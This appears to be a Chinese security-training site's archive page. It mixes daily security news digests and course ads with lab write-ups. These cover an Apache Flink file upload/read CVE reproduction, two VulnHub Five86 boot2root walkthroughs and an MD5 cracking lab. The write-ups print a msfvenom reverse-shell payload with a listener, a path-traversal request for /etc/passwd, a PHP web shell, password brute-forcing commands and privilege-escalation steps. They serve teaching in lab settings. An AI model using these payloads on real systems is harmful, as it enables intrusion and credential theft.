网络安全日报 2021年01月19日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、苹果修复了MacOS上防火墙为自家App开绿灯的问题
https://www.zdnet.com/article/apple-removes-feature-that-allowed-its-apps-to-bypass-macos-firewalls-and-vpns/
2、OpenWRT论坛被黑入侵者窃取了用户数据
https://securityaffairs.co/wordpress/113586/data-breach/openwrt-forum-hacked.html
3、研究人员发现Capital Capital的多名C级人员记录泄漏
https://securityaffairs.co/wordpress/113581/deep-web/capital-economics-data-leak.html
4、麦当劳叔叔之家泄露约1.8万患者数据
https://www.databreaches.net/ronald-mcdonald-house-notifying-almost-18000-guests-of-blackbaud-breach/
5、2020年公开披露的数据泄露有730起超过220亿条记录
https://www.crn.in/news/over-22-bn-records-exposed-in-data-breaches-in-2020-report/
6、Windows 10 打开特定路径可导致蓝屏崩溃
https://www.bleepingcomputer.com/news/security/windows-10-bug-crashes-your-pc-when-you-access-this-location/
7、安全研究人员控制了一个国家/地区已过期的顶级域
https://techcrunch.com/2021/01/15/congo-comandeered/
8、IObit论坛遭到DeroHE勒索软件攻击
https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-in-widespread-derohe-ransomware-attack/
9、DuckDuckGo在2020年增长了62%
https://www.bleepingcomputer.com/news/technology/privacy-focused-search-engine-duckduckgo-grew-by-62-percent-in-2020/
10、Facebook起诉恶意Chrome扩展程序的制造商抓取数据
https://www.bleepingcomputer.com/news/security/facebook-sues-makers-of-malicious-chrome-extensions-for-scraping-data/
找到一个可利用的SQL注入
渗透测试是非常有创意而且有挑战的事,既需要一些基础知识的积累,也需要一些创意和Hacker思考方式,只要你对网络安全技术充满了兴趣,甚至可以从0基础学习。
我该如何入手学习?
了解渗透测试的体系轮廓是第一步,从全景上认识这门技术,所谓全景,就是在埋头苦学之前,先搞清楚整个知识体系的框架结构。否则如盲人摸象,连门在哪都不知道,自然无法入门。一般的学习路径是:了解轮廓——工具+靶机——专项漏洞训练——开发工具、加强实战。
工具哪里找?
在一个实用的工具包里尽可能多的包含渗透和审计工具。Kali 实现了这个目标,大多数做安全测试的开源工具都被囊括在内。
它包含数百种渗透测试工具
免费使用
多语言
专项漏洞训练-SQL注入:
1.寻求更好的防御操作,
2.突破sql注入难点,
3.为数据库安全保驾护航。
专项漏洞训练-文件上传:
目前为止文件上传漏洞还是存在的,在进行一般的渗透测试中,找到上传点后绕过上传限制,将恶意脚本文件上传之后进行控制,拿下Webshell。
送给大家几句话:
想要了解某个技术,请阅读一些相关文档;
想要明白某个技术,请尝试实践这些技术;
想要悟透某个技术,请尝试向他人讲解此技术。
课程安排:
1月18日15:00 Vm安装Kali环境
1月19日15:00 Sql注入
1月20日20:00 文件上传
网络安全日报 2021年01月18日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Siemens PLM产品中的数十个漏洞允许执行代码
https://www.securityweek.com/tens-vulnerabilities-siemens-plm-products-allow-code-execution
2、微软将于2月9日的安全更新启动Zerologon漏洞补丁的第二阶段
https://www.securityweek.com/microsoft-reminds-organizations-upcoming-phase-patching-zerologon-vulnerability
3、Orbit Fox WordPress插件中的漏洞可导致站点被接管
https://securityaffairs.co/wordpress/113394/hacking/wordpress-orbit-fox-flaws.html
4、安全研究员发起了一个报告恶意软件漏洞的项目-Malvuln
https://securityaffairs.co/wordpress/113468/hacking/malvuln-project.html
5、Linux Mint修复了屏保绕过漏洞
https://securityaffairs.co/wordpress/113518/hacking/screensaver-bypass-linux-mint.html
6、NSA建议企业使用“ DNS over HTTPS (DoH) ”
https://thehackernews.com/2021/01/nsa-suggests-enterprises-use-designated.html
7、全球最大的黑市支付卡交易市场Joker's Stash宣布关闭
https://thehackernews.com/2021/01/jokers-stash-largest-carding.html
8、亚马逊Ring Neighbors应用暴露用户位置
https://techcrunch.com/2021/01/14/ring-neighbors-exposed-locations-addresses/
9、Apache Velocity XSS漏洞影响政府网站
https://www.bleepingcomputer.com/news/security/undisclosed-apache-velocity-xss-vulnerability-impacts-gov-sites/
10、网络钓鱼活动利用Finger命令下载后门
https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/
Apache Flink漏洞复现
你是否正在收集各类网安网安知识学习,蚁景网安实验室为你总结了1300+网安技能任你学,https://www.yijinglab.com/mobile/actReg.html>>
简介
Apache Flink 是高效和分布式的通用数据处理平台,由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎(简单来说,就是跟spark类似)。Flink 具有监控 API,可用于查询"正在运行的jobs" 和 "最近完成的jobs" 的状态和统计信息。该监控 API 被用于 Flink 自己的dashboard,同时也可用于自定义监控工具,默认监听在8081端口。
本文涉及知识点实操练习:https://www.yijinglab.com/cour.do?w=1&c=C172.19.104.182015010409302300001 (“网络安全事件”这门课程是由一些影响比较大的安全事件所模拟的测试环境组成。此课程不仅会添加以往的安全事件,而且还会紧跟时事,去添加最新的安全事件。让大家在第一时间了解,并懂得怎么去保护自身安全为目的。)
该监控 API 是 REST-ful API, 即接受 HTTP请求,并响应JSON格式的数据。
监控 API 中有一个API是 /jars/upload,其作用是将一个jar上传到集群。该jar必须作为多部分数据发送。确保“ Content-Type”标头设置为“ application / x-java-archive”,因为某些http库默认情况下不添加标头。可以通过curl上传jar文件
'curl -X POST -H "Expect:" -F "jarfile=@path/to/flink-job.jar" http://hostname:port/jars/upload'
概述
Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致任意文件读取(CVE-2020-17519)和任意文件写入(CVE-2020-17518)漏洞。
CVE-2020-17518攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)。
CVE-2020-17519Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的)。
影响版本
CVE-2020-17518
Apache:Apache Flink: 1.5.1 - 1.11.2
CVE-2020-17519
Apache:Apache Flink: 1.11.0, 1.11.1, 1.11.2
环境搭建
因为受到两个漏洞影响的版本都包含了1.11.2,所以统一使用这个版本进行复现
此处利用vulhub的环境进行复现,新建docker-compose.yml
version: '2'
services:
flink:
image: vulhub/flink:1.11.2
command: jobmanager
ports:
- "8081:8081"
- "6123:6123"
使用docker-compose启动该环境,执行以下命令会下载镜像并以此镜像启动一个容器,映射的端口为8081和6123
docker-compose up -d
访问http://ip:8081
漏洞复现
任意文件上传(CVE-2020-17518)复现:
Apache Flink 1.5.1引入了REST处理程序,该处理程序允许通过经过恶意修改的HTTP HEADER将上传的文件写入本地文件系统上的任意位置。
访问http://ip:8081,找到Submit New Job的Add New上传一个jar包,jar包可以在桌面新建一个压缩文件,将zip后缀修改为jar即可,然后抓包
抓到的请求包如下:
将请求包发送到repeater模块进行修改,比如我这里是在/tmp目录下新建一个文件,../是为了方便切换路径,因为我们不知到当前的路径是什么,所以可以使用../切换到根目录。
查看文件是否上传成功
docker ps查看容器
进入容器
docker exec -it CONTAINER ID /bin/bash
可以看到文件成功上传
flink 本身是没有鉴权的,并且它本身支持任意jar包上传并执行,所以可以通过上传jar包getshell
生成jar格式的马
lhost为kali的ip,lport为kali接收shell的端口
msfvenom -p java/shell_reverse_tcp lhost=192.168.74.142 lport=1234 -f jar >/home/a.jar
启动msf接收shell
msfconsole
use exploit/multi/handler
set payload java/shell_reverse_tcp
set LHOST 192.168.74.142
set LPORT 1234
exploit
将jar包上传后点击上传的包然后Submit
获取到shell
任意文件读取(CVE-2020-17519)复现:
Apache Flink 1.11.0中引入的更改(以及1.11.1和1.11.2中也发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。访问仅限于JobManager进程可访问的文件。
比如我这里读取/etc/下的passwd文件,%252f为/的两次url编码
192.168.74.134:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
漏洞修复
官方已发布安全版本,请及时下载升级至安全版本。
https://flink.apache.org/zh/downloads.html 参考链接
https://github.com/vulhub/vulhub/tree/master/flinkhttps://www.anquanke.com/post/id/227668 如果看完这一篇还不过瘾的话可以去实验室做实验继续学习哦。
Five86-2靶机渗透实战
你是否正在收集各类网安网安知识学习,蚁景网安实验室为你总结了1300+网安技能任你学,https://www.yijinglab.com/mobile/actReg.html>>
靶机地址:http://www.vulnhub.com/entry/five86-2,418/
本文涉及知识点实操练习:https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182014112610341500001相关实验:https://www.yijinglab.com/expc.do?ec=ECIDdb58-4b9d-427b-b7b3-8382c7e0a7f5 (Node 1.0 是一个难度为中等的Boot2root/CTF挑战,靶场环境最初由 HackTheBox 创建,实验目的是获取两个flag)
技术点总结
• 对WordPress网站的渗透
– https://www.freebuf.com/sectool/174663.html
• WordPress中IEAC插件的RCE漏洞
– https://www.freebuf.com/vuls/205735.html
• tcpdump的使用
– https://www.cnblogs.com/lvdongjie/p/10911564.html
目标发现
nmap -sP 参数使用 ping 扫描局域网主机,目的地址为 192.168.56.6
nmap -A 192.168.56.6 -p- 可以看到目标主机的一些信息,-A 是进行操作系统指纹和版本检测,-p- 是全端口
开放了 22、21、80 端口,并且 80 端口是WordPress 5.1.4的CMS
这里最好提前在/etc/hosts中加上192.168.56.6 five86-2这一条,因为后面访问wordpress的后台wp-admin时会跳转到到这个域名
漏洞发现与利用
在searchsploit和Google并没有发现WordPress 5.1.4的漏洞,可以用wpscan扫描一下这个URL。wpscan是一款针对WordPress的扫描器,详细的使用可以参考https://www.freebuf.com/sectool/174663.html。
默认扫描会返回目标站点的中间件、XML-RPC、readme文件、上传路径、WP-Corn、版本、主题、所有的插件和备份文件。
命令wpscan -u http://192.168.56.6/
这里并没有发现很有用的信息,考虑去枚举用户名,然后配合rockyou.txt去爆破密码。爆破用户名命令wpscan --url http://192.168.56.6/ --enumerate u,发现了5个用户
peteradminbarneygillianstephen
爆破密码命令wpscan --url http://192.168.56.6/ -U user.txt -P /usr/share/wordlists/rockyou.txt
最终爆破出来两个结果
Username: barney, Password: spooky1Username: stephen, Password: apollo1
使用barney登录后台http://five86-2/wp-admin/,可以看到这个站点安装了三个插件,但是只激活了一个Insert or Embed Articulate Content into WordPress Trial(IEAC)
Akismet Anti-Spam Version 4.1.1Hello Dolly Version 1.7.1IEAC Version 4.2995
在谷歌上搜索一下,不难搜到这个插件的RCE:https://www.freebuf.com/vuls/205735.html,在https://www.exploit-db.com/exploits/46981上也有
先生成poc.zip,
echo "hello" > index.htmlecho "<?php echo system($_GET['cmd']); ?>" > index.phpzip poc.zip index.html index.php
然后登录wordpress后台,选择新建文章
选择添加区块
选择E-Learning
上传poc.zip
选择Insert As iFrame
可以看到上传的位置,也就是说上次的shell位置为http://192.168.56.6/wp-content/uploads/articulate_uploads/poc/index.php
测试shellhttp://192.168.56.6/wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami这就拿到了shell
使用php-reverse-shell去反弹shell,访问http://192.168.56.6/wp-content/uploads/articulate_uploads/poc4/shell.php就可以看到反弹的shell,还不是TTY,接下来就想办法变成TTY吧
ls /home发现有8个目录,刚刚爆破来两个密码,一个登陆了后台,还有一个没有测试,并且两个都在这8个用户里面。可以先试试su barney,密码填spooky1,发现失败,再试试stephen,密码apollo1。这里的shell不知道为什么没有前面的$了,但是可以用
实际上,这里的www-data可以直接使用python3 -c 'import pty;pty.spawn("/bin/bash")'变成TTY,这样可能更方便一些
然后再sudo -l发现需要密码,并且不是spooky1,所以还是su stephen吧,发现stephen在一个名为pcap的用户组中(pcap不是流量包吗^_^)
然后sudo -l发现无法执行sudo
回到pcap那里,流量包是不是意味着流量分析,尝试ifconfig发现没有这个命令,但是可以使用ip add,发现目前运行着几个网络接口
这里的最后一个接口好像是动态的,每次都不一样,可以使用tcpdump -D列出可用于抓包的接口。这里选择把后面两个抓下来,因为不怎么常见。抓包命令为timeout 120 tcpdump -w 1.pcap -i veth2c37c59,其中timeout 120是指2分钟,-w是将结果输出到文件,-i是指定监听端口
可以去分析一下这两个流量包,命令tcpdump -r 1.pcap,这里-r是从给定的流量包读取数据,不难发现paul用户FTP的密码esomepasswford。后面2.pcap与1.pcap内容相同。
接着su paul,用上面的那个密码发现可以登陆。尝试sudo -l发现stephen可以使用peter的service命令
那不就可以直接执行peter的/bin/bash了吗。命令sudo -u peter service /bin/bash。这里要注意一下目录的问题,用相对目录找到/bin/bash的位置
获取peter的权限后,还是先sudo -l,发现他可以运行root用户的passwd命令,这我直接修改root的密码不就获取root权限了吗
是时候表演真正的技术了。sudo -u root passwd root(强迫症,全文一致),用sudo passwd root一样的
找到flag
如果看完这一篇还不过瘾的话可以去实验室做实验继续学习哦。
网络安全日报 2021年01月15日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、研究人员发现F5 BIG-IP系统中存在DoS漏洞影响版本14.x和15.x
https://securityaffairs.co/wordpress/113440/security/f5-big-ip-dos.html
2、Capcom披露在2020年11月的勒索攻击中数万个人信息数据被盗
https://www.securityweek.com/capcom-says-personal-data-thousands-more-stolen-ransomware-attack
3、研究人员发现Comtrol工业网关漏洞可创建后门
https://www.securityweek.com/vulnerabilities-can-allow-hackers-create-backdoors-comtrol-industrial-gateways
4、Spalax恶意软件活动针对哥伦比亚政府机构和公司
https://securityaffairs.co/wordpress/113429/hacking/operation-spalax-malware.html
5、思科解决了CMX软件中的严重漏洞
https://securityaffairs.co/wordpress/113395/security/cisco-high-severity-flaw-cmx.html
6、CISA发布警告:黑客绕过MFA访问云服务帐户
https://www.bleepingcomputer.com/news/security/cisa-hackers-bypassed-mfa-to-access-cloud-service-accounts/
7、安全厂商发布APT组织SideWinder分析报告
https://cybersecurity.att.com/blogs/labs-research/a-global-perspective-of-the-sidewinder-apt
8、Ursnif木马新变种攻击意大利用户
https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy
9、Windows 10中未修补的零日漏洞可破坏NTFS格式的硬盘
https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/
10、自动欺诈即服务Classiscam已经骗取了650万美元
https://threatpost.com/telegram-bots-classiscam-scam/163061/
Five86-1靶机渗透实战
你是否正在收集各类网安网安知识学习,蚁景网安实验室为你总结了1300+网安技能任你学,https://www.yijinglab.com/mobile/actReg.html>>
靶机地址:http://www.vulnhub.com/entry/five86-1,417/
相关实验:https://www.yijinglab.com/expc.do?ec=ECIDdb58-4b9d-427b-b7b3-8382c7e0a7f5 (Node 1.0 是一个难度为中等的Boot2root/CTF挑战,靶场环境最初由 HackTheBox 创建,实验目的是获取两个flag)
技术点
opennetadmin v18.1.1RCE
searchsploit
github搜索exp
破解Linux中经过HASH加密的密码
crunch生成字典
john和hashcat破解密码
hash-identifier查看HASH类型
SSH免密登陆
公钥复制为authorized_keys
Linux查看当前用户权限可读文件和可执行命令
查看当前用户权限可读文件find / -type f -user www-data
可执行命令sudo -l
目标发现
nmap -sP 参数使用 ping 扫描局域网主机,目的地址为 192.168.56.5
nmap -sS -A -v 192.168.56.5 看一下详细的扫描结果 -sS 是半开放扫描,-A 是进行操作系统指纹和版本检测,-v 输出详细情况
可以看到开放了 22、80、10000 三个端口,并且 80 端口存在 robots.txt 和路径 /ona
漏洞发现与利用
访问192.168.56.5是个空白页面,然后去访问 /ona,可以看到是 opennetadmin 的管理页面,并且版本是 18.1.1
v18.1.1的opennetadmin是存在RCE漏洞的,在github找个exp打过去就可以,github.com/amriunix/ona-rce
或者是使用 searchsploit ,不过这里有个坑点,就是要对这个bash脚本进行转换格式,否则会报错,使用dos2unix 47691.sh这个命令,而且这里的shell不能转成TTY
下面的问题就是如何进行提权了,经过一番测试,发现这里无法执行的命令是没有回显的,并且不能执行cd命令,但是可以使用ls和cat命令
这里肯定是有权限控制的,可以使用find / -type f -user www-data命令查看这个用户可以读取的文件,除了/proc 就是/var/www/html/reports/.htaccess和/var/log/ona.log
读取var/www/html/reports/.htaccess可以找到AuthUserFile的路径/var/www/.htpasswd
读取这个文件如下,可以得到用户名douglas和HASH的密码$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1,给的提示是只包含aefhrt的十个字符
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1 # To make things slightly less painful (a standard dictionary will likely fail), # use the following character set for this 10 character password: aefhrt
先用hash-identifier看一下是哪个HASH,结果 hash -type : [+] MD5(APR)
然后使用crunch生成对应的字典,命令格式crunch <min-len> <max-len> [charset string] [options],这里生成只包含aefhrt的10个字符,就可以使用如下命令crunch 10 10 aefhrt -o pass.txt,更多的介绍可以看https://www.freebuf.com/sectool/170817.html和https://blog.csdn.net/qq_42025840/article/details/81125584
最后就要用大名鼎鼎的hashcat去破解这个HASH,命令格式hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...,这里使用的命令为hashcat -m 1600 -a 0 -o res hash.txt pass.txt
-m是HASH类别,-a是攻击方式,-o是输出结果,更多的参数可以参考https://www.freebuf.com/sectool/164507.html。这里在kali里面运行一直报错,就转移到wsl2里面了,命令hashcat -m 1600 -a 0 -o res hash.txt pass.txt --force
最终密码为 fatherrrrr
或者这里也可以使用john来进行破解john --wordlist=pass.txt hash.txt,但是速度可能有丶问题
使用ssh连接ssh douglas@192.168.56.5
这里是个TTY,但还是存在权限控制,使用sudo -l看一下可以使用什么命令,结果是(jen) NOPASSWD: /bin/cp,这里就有点奇怪了,douglas可以用jen的身份运行cp命令
先去访问一下home目录,发现douglas和jen这两个用户,但是只能用jen的cp命令,且没有jen的密码
值得注意的是,如果jen用户下的/home/jen/.ssh/authorized_keys包含douglas的公钥,那就可以用douglas的id_rsa文件登陆jen的ssh,也即免密登陆jen的ssh。这里复制到/tmp目录下是因为jen没有权限访问douglas目录下的文件
cp .ssh/id_rsa.pub /tmp/authorized_keys chmod 777 /tmp/authorized_keys sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
然后用ssh连接ssh -i id_rsa jen@127.0.0.1
成功登陆jen,看到提示mail,还是先执行echo $(find / -type f -user jen) > 1.txt 看一下,有一个/var/mail/jen的文件可以读取
或者这里直接输入mail的命令也可以看到
读取一下,其内容如下
关键词:change Moss's password、his password is now Fire!Fire!
接着ssh连接moss用户ssh moss@127.0.0.1
在当前目录发现了一个隐藏目录.games,访问后发现一个root权限的二进制文件upyourgame
运行之后就发现自己神奇的变成root用户辣
最后,flag在/root中,为8f3b38dd95eccf600593da4522251746
彩蛋时刻,其实在拿到douglas的密码之后就可以用虚拟机登陆,然后操作,这里是用的moss的账号密码,也是同样的效果
如果看完这一篇还不过瘾的话可以去实验室做实验继续学习哦。
第四届上海第二工业大学网络攻防大赛圆满结束
2021年1月6日,第四届上海第二工业大学网络攻防大赛圆满结束。蚁景网安实验室为竞赛提供平台技术支持。我司本着“以赛促训”理念,与校方共同积极推动人才培养方案与模式的改革。
校方重视本次竞赛的开展,网安相关专业学生积极组队参与报名。
比赛采用线下攻防对抗的形式,比赛现场大屏展示比赛实时战况;各队成员积极协作,看实况,调战略;我们见证了同空间、同时间内的不同战略巅峰对决。
参赛队伍历经多个回合的激烈比拼,最终以下队伍名列前茅,获得殊荣。
用户名奖项全场消费由孙公子买单一等奖渣渣辉是最强的!二等奖魂紫队二等奖白给人二等奖sspu_xzl三等奖G1924三等奖惊鸿三等奖别打我三等奖繁三等奖反余弦三等奖人类一败涂地三等奖恭喜上述获奖的同学,也希望所有参赛的同学能够从这次比赛中总结出自己的优势和短板,在之后的实践中变得强大。
MD5加解密与暴力破解
本实验围绕MD5加解密软件,通过对软件操作实现基本的字符加密和解密,介绍了MD5暴力破解的方法,通过本实验的学习,你能够掌握MD5破解的方法、过程和原理,增强对MD5算法安全性的认识。
实验简介
实验所属系列:网络安全实践
实验对象:本科/专科信息安全专业
相关课程及专业:计算机基础,Linux基础
实验类别:实践实验类
预备知识
本实验要求实验者具备如下的相关知识。
hash,一般翻译做“散列”,也有直接音译为"哈希",就是把任意长度的输入通过散列算法,变换成固定长度的输出,该输出就是散列值。这种转换是一种压缩映射,也就是散列值的空间通常远小于输入的空间,不同的输入可能会散列成相同的输出,而不可能从散列来唯一 确定输入值。简单说就是一种将任意长度的消息压缩到某一固定长度的消息摘要的函数。MD5和SHA1可以说是目前应用最广泛的Hash算法,而它们都是以MD4为基础设计的。
1、MD4
MD4(RFC 1320)是MIT的Ronald L. Rivest在1990年设计的,MD是Message Digest的缩写。它适用在32位字长的处理器上用高速软件实现--它是基于 32 位操作数的位操作来实现的。
2、MD5
MD5(RFC 1321)Rivest于1991年对MD4的改进版本。它对输入仍以512位分组,其输出是4个32位字的级联,与MD4相同。MD5比MD4来得复杂并且速度较之要慢一点,但更安全,在抗分析和抗差分方面表现更好。
下面简单介绍一下MD5的安全性。
Rivest猜想作为128比特长的杂凑值来说,MD5的强度达到了最大,比如找出具有相同杂凑值的两个消息需执行O(264)次运算,而寻找具有给定杂凑值的一个消息需要执行O(2128)次运算。
然而,2004年山东大学的王小云等成功找出了MD5的碰撞,发生碰撞的消息有两个1024 比特长的串M、Ni构成,设消息M||Ni的碰撞时M’和Ni’,在IBMP690上找M和M’花费时间大约一小时,找到M和M’后,则只需15秒至5分钟就可找出Ni和Ni’。
2007年,Marc Stevens,Arjen K. Lenstra和Benne de Weger进一步指出通过伪造软件签名,可重复性攻击MD5算法。研究者使用前缀碰撞法(chosen-prefix collision),使程序前端包含恶意程序,利用后面的空间添上垃圾代码凑出同样的MD5 Hash值。
2008年,荷兰埃因霍芬技术大学科学家成功把2个可执行文件进行了MD5碰撞,使得这两个运行结果不同的程序被计算出同一个MD5。2008年12月一组科研人员通过MD5碰撞成功生成了伪造的SSL证书,这使得在https协议中服务器可以伪造一些根CA的签名。
现在随着硬件技术和计算机处理能力的快速上升,MD5的暴力破解也越来越快,在安全要求高的场合一般不会使用MD5
实验目的
了解MD5破解原理,熟练使用MD5破解工具。
实验环境
Windows操作系统
实验地址:
https://www.yijinglab.com/expc.do?ec=ECID172.19.104.182015081317154100001https://www.yijinglab.com/expc.do?ec=c1385a78-f8dc-4259-9a84-bcbad7ada107
网络安全日报 2021年01月14日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、SolarLeaks网站出售SolarWinds攻击被盗数据
https://www.bleepingcomputer.com/news/security/solarleaks-site-claims-to-sell-data-stolen-in-solarwinds-attacks/
2、研究人员发现针对巴基斯坦用户的间谍软件
https://news.sophos.com/en-us/2021/01/12/new-android-spyware-targets-users-in-pakistan/
3、思科修复了与67个CVE相关的高危漏洞
https://threatpost.com/cisco-flaw-cmx-software-retailers/163027/
4、研究人员在暗网中发现一种名为Rogue的新型移动RAT
https://securityaffairs.co/wordpress/113369/malware/rogue-android-rat-darkweb.html
5、Incaseformat蠕虫病毒再次发作
https://www.huorong.cn/info/1610535542569.html
6、新西兰中央银行遭黑客入侵是利用了Accellion FTA漏洞
https://securityaffairs.co/wordpress/113374/hacking/new-zealand-central-bank-attack-accellion.html
7、Linux内核开发者讨论停止支持部分旧 CPU
https://www.solidot.org/story?sid=66633
8、Mimecast披露可能与SolarWinds Hack有关的证书事件
https://www.securityweek.com/mimecast-discloses-certificate-incident-possibly-related-solarwinds-hack
9、微软发布支持Linux的Microsoft Defender for Endpoint
https://www.securityweek.com/microsoft-defender-endpoint-linux-goes-live
10、黑客泄露从EMA窃取的COVID-19疫苗数据
https://www.securityweek.com/hackers-publish-covid-19-vaccine-data-stolen-eu-medicines-agency
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

